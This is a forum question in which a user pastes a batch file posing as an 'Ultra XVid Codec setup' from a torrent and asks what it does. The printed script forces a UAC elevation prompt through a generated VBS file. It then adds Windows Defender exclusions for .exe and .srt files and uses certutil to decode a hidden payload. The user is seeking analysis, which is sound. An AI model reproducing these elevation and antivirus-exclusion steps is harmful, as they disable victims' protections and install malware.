Can someone explain what this batch file do?

  batch-file, powershell, windows

I recently downloaded a media package from torrent which doesn’t run on vlc and on windows media player it says "The Player might not support the file type or might not support the codec that was used to compress the file". the package also includes a batch file with name Ultra XVid Codec setup. when I tried running asked for some admin permission so I denied and closed it. Later I opened it using vscode and the code was this. just out of curiosity can someone briefly explain what this code tries to do and what threat is posseses.

 @echo off
 ECHO ======================================
 ECHO ===Running Admin shell please wait====

 setlocal DisableDelayedExpansion
 set cmdInvoke=1
 set winSysFolder=System32
 set "batchPath=%~0"
 for %%k in (%0) do set batchName=%%~nk
 set "vbsGetPrivileges=%temp%OEgetPriv_%batchName%.vbs"
 setlocal EnableDelayedExpansion

  if '%errorlevel%' == '0' ( goto gotPrivileges ) else ( goto getPrivileges )

  if '%1'=='ELEV' (echo ELEV & shift /1 & goto gotPrivileges)
  ECHO **************************************
  ECHO Invoking UAC for Privilege Escalation
  ECHO **************************************

  ECHO Set UAC = CreateObject^("Shell.Application"^) > "%vbsGetPrivileges%"
  ECHO args = "ELEV " >> "%vbsGetPrivileges%"
  ECHO For Each strArg in WScript.Arguments >> "%vbsGetPrivileges%"
  ECHO args = args ^& strArg ^& " "  >> "%vbsGetPrivileges%"
  ECHO Next >> "%vbsGetPrivileges%"

  if '%cmdInvoke%'=='1' goto InvokeCmd 

  ECHO UAC.ShellExecute "!batchPath!", args, "", "runas", 1 >> "%vbsGetPrivileges%"
  goto ExecElevation

  ECHO args = "/c """ + "!batchPath!" + """ " + args >> "%vbsGetPrivileges%"
  ECHO UAC.ShellExecute "%SystemRoot%%winSysFolder%cmd.exe", args, "", "runas", 1 >> "%vbsGetPrivileges%"

 "%SystemRoot%%winSysFolder%WScript.exe" "%vbsGetPrivileges%" %*
 exit /B

 setlocal & cd /d %~dp0
 if '%1'=='ELEV' (del "%vbsGetPrivileges%" 1>nul 2>nul  &  shift /1)

 powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExt "exe"
 powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExt "srt"
 ECHO Download update..
 ping -n 8 > nul

 certutil -decodehex -f


 ECHO %batchName% Arguments: P1=%1 P2=%2 P3=%3 P4=%4 P5=%5 P6=%6 P7=%7 P8=%8 P9=%9
 cmd /k

Source: Windows Questions

One Reply to “Can someone explain what this batch file do?”

Leave a Reply to jj Cancel reply